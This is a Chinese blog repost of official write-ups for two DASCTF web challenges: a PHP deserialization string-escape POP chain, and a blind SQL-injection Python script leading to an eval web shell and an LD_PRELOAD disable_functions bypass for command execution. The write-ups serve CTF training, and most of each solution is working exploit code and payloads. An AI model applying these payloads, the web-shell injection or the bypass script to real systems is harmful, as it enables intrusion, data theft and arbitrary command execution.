devbox
寸_铁
这个屌丝很懒,什么也没留下!
关注作者
热门标签
热门文章
当前位置:   article > 正文

DASCTF-两道web题复现_dasctf{

作者:寸_铁 | 2024-07-29 21:23:31

dasctf{

记录一下官方题解

Ezunserialize

打开题目看到源码

  1. <?php 
  2. show_source("index.php"); 
  3. function write($data) { 
  4.     return str_replace(chr(0) . '*' . chr(0), '\0\0\0', $data); 
  5. } 
  6.  
  7. function read($data) { 
  8.     return str_replace('\0\0\0', chr(0) . '*' . chr(0), $data); 
  9. } 
  10.  
  11. class A{ 
  12.     public $username; 
  13.     public $password; 
  14.     function __construct($a, $b){ 
  15.         $this->username = $a; 
  16.         $this->password = $b; 
  17.     } 
  18. } 
  19.  
  20. class B{ 
  21.     public $b = 'gqy'; 
  22.     function __destruct(){ 
  23.         $c = 'a'.$this->b; 
  24.         echo $c; 
  25.     } 
  26. } 
  27.  
  28. class C{ 
  29.     public $c; 
  30.     function __toString(){ 
  31.         //flag.php 
  32.         echo file_get_contents($this->c); 
  33.         return 'nice'; 
  34.     } 
  35. } 
  36.  
  37. $a = new A($_GET['a'],$_GET['b']); 
  38. //省略了存储序列化数据的过程,下面是取出来并反序列化的操作 
  39. $b = unserialize(read(write(serialize($a))));

先实现B->C

  1. $b = new b();
  2. $c = new c();
  3. $c->c = 'flag.php';
  4. $b->b = $c;
  5. $x = serialize($b);
  6. echo $x;
  7. //O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"flag.php";}}

然后就是字符串逃逸实现A->B

  1. $a = new A("\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0",'1";s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"flag.php";}};}');
  2. $a = serialize($a);
  3. echo $a."\n";
  4. $a = write($a);
  5. echo $a."\n";
  6. $a = read($a);
  7. echo $a."\n";

将payload进行url加密

a=%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0&b=1%22%3Bs%3A8%3A%22password%22%3BO%3A1%3A%22B%22%3A1%3A%7Bs%3A1%3A%22b%22%3BO%3A1%3A%22C%22%3A1%3A%7Bs%3A1%3A%22c%22%3Bs%3A8%3A%22flag.php%22%3B%7D%7D

babytricks

打开题目是个登录界面,查看源码发现提示

<!-- tips:select * from user where user='$user' and passwd='%s'-->

这是个格式化字符串漏洞,过滤了select,单引号,like,regexp,跑密码脚本,密码最后一位需要减一

  1. import requests
  2. flag=""
  3. flag2=""
  4. arg1=""
  5. arg2=""
  6. i=1
  7. n=2
  8.  
  9. for i in range(1,28):
  10.     print(i)
  11.     m=64
  12.     j=64
  13.     for q in range(1,8):
  14.         if q!=1:
  15.             j=j/2
  16.             if n==1:
  17.                 m=m+j
  18.             elif n==0:
  19.                 m=m-j
  20.         arg2=chr(m)
  21.         arg2=flag2+arg2
  22.         url="http://183.129.189.60:10010/"
  23.         user='%1$c^0 and passwd between CONCAT("{}",BINARY("")) and CONCAT("{}",BINARY(""))#'.format(arg1,arg2)
  24.         #print user
  25.         data={"user":user,
  26.               "passwd":39
  27.               }
  28.         p=requests.post(url,data=data)
  29.         if "username or password error" not in p.text:
  30.             n=0
  31.         else:
  32.             n=1
  33.         if q==7:
  34.             if "username or password error" not in p.text:
  35.                 flag=flag+chr(m-1)
  36.                 arg2=chr(m-1)
  37.                 flag2=flag2+arg2
  38.             else:
  39.                 flag=flag+chr(m)
  40.                 flag2=arg2
  41.             print flag
  42.  
  43. #GoODLUcKcTFer202OHAckFuN

得到密码之后登录,提示前台什么都没有,添加admin目录进入后台登录页面,使用刚刚得到的密码,得到下一步源码

  1. Your sandbox: ./shells/iIu9B9eVuikO3cOi/ set your shell
  2. <?php 
  3. error_reporting(0); 
  4. session_save_path('session'); 
  5. session_start(); 
  6. require_once './init.php'; 
  7. if($_SESSION['login']!=1){ 
  8.     die("<script>window.location.href='./index.php'</script>"); 
  9. } 
  10. if($_GET['shell']){ 
  11.     $shell= addslashes($_GET['shell']); 
  12.     $file = file_get_contents('./shell.php'); 
  13.     $file = preg_replace("/\\\$shell = '.*';/s", "\$shell = '{$shell}';", $file); 
  14.     file_put_contents('./shell.php', $file); 
  15. }else{ 
  16.     echo "set your shell"."<br>"; 
  17.     chdir("/"); 
  18.     highlight_file(dirname(__FILE__)."/admin.php"); 
  19. } 
  20. ?>

payload

  1. ?shell=;eval($_POST[a]);
  2. ?shell=$0

shell.php文件中的代码

  1. <?php
  2. $shell = '$shell = ';eval($_POST[a]);';';
  3. echo $shell;

由于这里过滤了很多系统函数,使用LD_PRELOAD进行bypass

  1. <?php
  2.     echo "<p> <b>example</b>: http://site.com/bypass_disablefunc.php?cmd=pwd&outpath=/tmp/xx&sopath=/var/www/bypass_disablefunc_x64.so </p>";
  3.  
  4.     $cmd = $_GET["cmd"];
  5.     $out_path = $_GET["outpath"];
  6.     $evil_cmdline = $cmd . " > " . $out_path . " 2>&1";
  7.     echo "<p> <b>cmdline</b>: " . $evil_cmdline . "</p>";
  8.  
  9.     putenv("EVIL_CMDLINE=" . $evil_cmdline);
  10.  
  11.     $so_path = $_GET["sopath"];
  12.     putenv("LD_PRELOAD=" . $so_path);
  13.  
  14.     $res = gnupg_init();
  15.     gnupg_seterrormode($res, GNUPG_ERROR_WARNING);
  16.     $info = gnupg_keyinfo($res, 'your-key-id');
  17.     echo "Key - Info<pre>";
  18.     var_dump($info);
  19.     echo "<pre>";
  20.  
  21.     echo "<p> <b>output</b>: <br />" . nl2br(file_get_contents($out_path)) . "</p>"; 
  22.  
  23.     unlink($out_path);
  24. ?>

访问下面网址,得到flag

http://183.129.189.60:10010/admin/shells/R0zK2XMtjvzvyxWz/bypass.php?cmd=cat%20/flag&outpath=/var/www/html/admin/shells/R0zK2XMtjvzvyxWz/xx&sopath=/var/www/html/admin/shells/R0zK2XMtjvzvyxWz/bypass_disablefunc_x64.so

 

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/寸_铁/article/detail/900656
推荐阅读
相关标签

Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。

  

闽ICP备14008679号